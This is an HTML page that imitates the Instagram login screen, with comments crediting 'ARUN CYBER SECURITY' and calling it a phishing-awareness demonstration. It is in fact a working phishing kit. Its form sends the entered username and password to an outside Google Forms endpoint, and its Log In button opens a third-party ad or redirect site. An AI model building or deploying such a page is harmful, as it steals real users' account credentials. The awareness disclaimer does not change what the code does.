<!DOCTYPE html>
<html> 
<head>

<tittle>Instagram </title>
 
<style>
@font-face {
font-family: 'Billabong';
font-style: cursive;
font-weight: normal;
src: local('Billabong'), url('Billabong.ttf') format('ttf')
}
body,section{
	position:center;
}
h1{
	
 font-family:Billabong;
 text-align:center;
 font-size:100px;
 
 }
 button{
	 background-color:blue;
	 border:none;
	 height:45px;
	 color:white;
	 width:500px;
	 border-radius:5px;
	 
 }
 b{
	 font-size:20px;
 }
 input{
	 margin-top:30px;
	 width:500px;
	 height:50px;
	 border-radius:5px;
	 border-color:coral;
	 outline:none;
	 border-color:lightgrey;
	 

	 
 }

 input:focus{
	 background-color:lightblue;
 }
#link2,a{
	 margin-left:300px;
	 text-decoration:none;
	 color:blue;
	 font-size:30px;
 }
 #link{
	 margin-left:10px;
 }
 div{
	 font-size:20px;
 }
 input,placeholder{
	 font-size:20px;
	 position:top;
 }
 placeholder{
	 text-align:top;
 }
 footer{
	 background-color:lightgrey;
	 font-family:sans serif;
 }
#or{
	font-size:50px;
}
</style>
</head>
<body>

<div id="title"> 
<center>
<h1> Instagram </h1>
</center>


<br/>
<br/> 
<!-- This website is code by ARUN CYBER SECURITY-->
<center>

<button>
<b>Continue With Facbook</b> </button>
<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLScHCWHoI8Q9NBZ39ir4AwzVqG6EGKqghxfjuNUnBXmw77OPBw/formResponse" target="_self" method="POST" >
<br/>
<input type="number" placeholder="Phone number,username, or email address" name="entry.1711099907"/>
<br/>
<input type="password" placeholder="Password" name="entry.73879627"  />
<br/>
<br/>
<a id="link2"href="#">Forget password? </a>
<br/>
<br/>
<br/>
<button onclick="window.open('https://goraps.com/fullpage.php?section=General&pub=248976&ga=g')"><b>Log In</b> </button>
</form>
<br/>
<br/>
<div>
<p id="signup">Don't have an account?<a id="link" href="#">Sign up </a></p>
<img src="app.png" width="200px"/> 
<img src="googleplay.png" width="200"/>
</div>
</form>
<!-- THIS WEBSITE IS JUST TO SHOW THAT HOW PHISHING ATTACK WORKS AND TO MAKE PEOPLE AWAR OF THIS ATTACK SO THAT ARUN CYBER SECURITY 
  IS NOT RESPONSIBLE FOR ANY CRMINALASTIC BEHAVIOR IF  FOUND YOU CAN CONTACT US THROUGH email:agencyarun5@gmail.com-->
  <!--END OF ARUN CYBER SECURITY CODE-->
<footer>
 <h6>from</h6>
   <b> Facebook</b>
   
</body>
</html>